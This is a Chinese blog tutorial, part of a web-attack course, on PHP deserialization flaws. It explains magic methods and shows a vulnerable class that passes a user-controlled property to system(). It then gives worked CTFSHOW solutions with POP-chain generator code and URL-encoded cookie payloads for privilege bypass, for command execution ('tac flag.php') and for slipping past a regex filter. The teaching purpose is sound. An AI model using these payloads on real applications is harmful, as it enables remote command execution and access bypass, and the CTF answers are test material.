【第60课】PHP反序列化&POP链构造&魔术方法流程&漏洞触发条件&属性修改

Lucker_YYY

已于 2024-08-15 09:36:54 修改

阅读量713

点赞数 34

分类专栏：（四）Web攻防文章标签： android

于 2024-08-14 14:31:01 首次发布

本文链接：https://blog.csdn.net/Lucker_YYY/article/details/141190347

版权

（四）Web攻防专栏收录该内容

36 篇文章 0 订阅

订阅专栏

免责声明

本文发布的工具和脚本，仅用作测试和学习研究，禁止用于商业用途，不能保证其合法性，准确性，完整性和有效性，请根据情况自行判断。

如果任何单位或个人认为该项目的脚本可能涉嫌侵犯其权利，则应及时通知并提供身份证明，所有权证明，我们将在收到认证文件后删除相关内容。

文中所涉及的技术、思路及工具等相关知识仅供安全为目的的学习使用，任何人不得将其应用于非法用途及盈利等目的，间接使用文章中的任何工具、思路及技术，我方对于由此引起的法律后果概不负责。

知识点：
1、PHP-反序列化-应用&识别&函数
2、PHP-反序列化-魔术方法&触发规则
3、PHP-反序列化-联合漏洞&POP链构造

在实战情况下，是不需要知道这些具体分析的，都是利用工具去扫一些框架爆出的反序列话漏洞直接利用即可。
学这些具体分析就是为了以后往漏洞挖掘方向发展或者打CTF比赛及面试会被问。

一、演示案例-PHP-DEMO1-序列化和反序列化

为什么会产生序列化？

为了解决开发中数据传输和数据解析的一个情况(类似于要发送一个椅子快递，不可能整个椅子打包发送，这是非常不方便的，所以就要对椅子进行序列化处理，让椅子分成很多部分在一起打包发送，到目的后重新组装，也就是反序列化处理)

什么是反序列化操作？ - 类型转换

PHP & JavaEE & Python（见图）
序列化：对象转换为数组或字符串等格式

反序列化：将数组或字符串等格式转换成对象

serialize() //将对象转换成一个字符串
unserialize() //将字符串还原成一个对象

二、演示案例-PHP-DEMO2-魔术方法触发规则

常见PHP魔术方法？- 对象逻辑（见图）
在这里插入图片描述

__construct(): //当对象new的时候会自动调用

在这里插入图片描述

__destruct()：//当对象被销毁时会被自动调用

在这里插入图片描述

__sleep(): //serialize()执行时被自动调用

在这里插入图片描述

__wakeup(): //unserialize()时会被自动调用

在这里插入图片描述

__invoke(): //把对象当作函数调用时触发

在这里插入图片描述

__toString(): //把对象当作字符串使用时触发

在这里插入图片描述

call(): //调用某个方法,若方法存在,则调用;若不存在,则会去调用call函数。

在这里插入图片描述

get(): //读取对象属性时,若存在,则返回属性值;若不存在，则会调用get函数

在这里插入图片描述

set(): //设置对象的属性时,若属性存在,则赋值;若不存在,则调用set函数。

在这里插入图片描述

__isset(): //在不可访问的属性(私有的)上调用isset()或empty()触发(isset和empty是一样的)

在这里插入图片描述

__unset(): //在不可访问的属性上使用unset()时触发

在这里插入图片描述

__set_state()，调用var_export()导出类时，此静态方法会被调用

__clone()，当对象复制完成时调用

__autoload()，尝试加载未定义的类

__debugInfo()，打印所需调试信息

__callStatic(): //在静态上下文中调用不可访问的方法时触发

三、演示案例-PHP-DEMO3-反序列化漏洞产生

为什么会出现安全漏洞？

原理：未对用户输入的序列化字符串进行检测，导致攻击者可以控制反序列化过程，从而导致代码执行，SQL注入，目录遍历等不可控后果。在反序列化的过程中自动触发了某些魔术方法。

3.php

解释

<?php class B{ public $cmd='ipconfig'; public function __destruct(){ system($this->cmd); } }

//函数引用，无对象创建触发魔术方法

unserialize($_GET['x']);

在这里插入图片描述

pop.php

解释

<?php class B{ public $cmd='ipconfig'; public function __destruct(){ system($this->cmd); } } $pop=new B(); echo serialize($pop);

在这里插入图片描述

想换成其他命令也简单，在pop.php把ipconfig改为其他命令即可

由反序列化处理新的序列化payload时，会把类B的cmd值替换为攻击者输入的命令，而不是代码中的ipconfig。

四、演示案例-PHP-CTFSHOW-POP触发链构造

反序列化漏洞如何利用？- POP链构造

POP：面向属性编程（Property-Oriented Programing）常用于上层语言构造特定调用链的方法，序列化攻击都在PHP魔术方法中出现可利用的漏洞，因自动调用触发漏洞，但如关键代码没在魔术方法中，而是在一个类的普通方法中。这时候就可以通过构造POP链寻找相同的函数名将类的属性和敏感函数的属性联系起来。

-反序列化常见起点（见图）
-反序列化常见跳板（见图）
-反序列化常见终点（见图）
在这里插入图片描述

#CTFSHOW-训练链构造（pop链核心就是代码有用的留下，没用的删掉）

254-对象引用执行逻辑

在这里插入图片描述
payload：username=xxxxxx&password=xxxxxx

255-反序列化变量修改

在这里插入图片描述

解释

POP链CODE: 1、不修改代码的用户密码 <?php class ctfShowUser{ public $isVip=true; } $a=new ctfShowUser(); echo urlencode(serialize($a)); ?>

在这里插入图片描述
Get:username=xxxxxx&password=xxxxxx
Cookie:user=O%3A11%3A%22ctfShowUser%22%3A1%3A%7Bs%3A5%3A%22isVip%22%3Bb%3A1%3B%7D

解释

POP链CODE: 2、修改代码的用户密码 <?php class ctfShowUser{ public $username='test'; public $password='test123'; public $isVip=true; } $a=new ctfShowUser(); echo urlencode(serialize($a)); ?>

在这里插入图片描述
Get:username=test&password=test123
Cookie:user=O%3A11%3A%22ctfShowUser%22%3A3%3A%7Bs%3A8%3A%22username%22%3Bs%3A4%3A%22test%22%3Bs%3A8%3A%22password%22%3Bs%3A7%3A%22test123%22%3Bs%3A5%3A%22isVip%22%3Bb%3A1%3B%7D

256-反序列化参数修改

在这里插入图片描述

解释

POP链CODE: <?php class ctfShowUser{ public $username='test'; public $password='test1'; public $isVip=true; } $a=new ctfShowUser(); echo urlencode(serialize($a)); ?>

在这里插入图片描述
GET:username=test&password=test1
COOKIE:user=O%3A11%3A%22ctfShowUser%22%3A3%3A%7Bs%3A8%3A%22username%22%3Bs%3A4%3A%22test%22%3Bs%3A8%3A%22password%22%3Bs%3A5%3A%22test1%22%3Bs%3A5%3A%22isVip%22%3Bb%3A1%3B%7D

257-反序列化参数修改&对象调用逻辑

在这里插入图片描述

解释

POP链CODE： <?php class ctfShowUser{ public $class = 'backDoor'; public function __construct(){ $this->class=new backDoor(); } } class backDoor{ public $code='system("tac flag.php");'; } echo urlencode(serialize(new ctfShowUser)); ?>

在这里插入图片描述
GET:username=xxxxxx&password=xxxxxx
COOKIE:user=O%3A11%3A%22ctfShowUser%22%3A1%3A%7Bs%3A5%3A%22class%22%3BO%3A8%3A%22backDoor%22%3A1%3A%7Bs%3A4%3A%22code%22%3Bs%3A23%3A%22system%28%22tac+flag.php%22%29%3B%22%3B%7D%7D

258-反序列化参数修改&对象调用逻辑&正则

在这里插入图片描述

解释

POP链CODE：

<?php
class ctfShowUser{
    public $class = 'backDoor';
    public function __construct(){
        $this->class=new backDoor();
    }
}
class backDoor{
    public $code="system('tac flag.php');";
}
$a=serialize(new ctfShowUser());
$b=str_replace(':11',':+11',$a);
$c=str_replace(':8',':+8',$b);
echo urlencode($c);
?>

在这里插入图片描述
GET:username=123&password=123
COOKIE:user=O%3A%2B11%3A%22ctfShowUser%22%3A1%3A%7Bs%3A5%3A%22class%22%3BO%3A%2B8%3A%22backDoor%22%3A1%3A%7Bs%3A4%3A%22code%22%3Bs%3A23%3A%22system%28%27tac+flag.php%27%29%3B%22%3B%7D%7D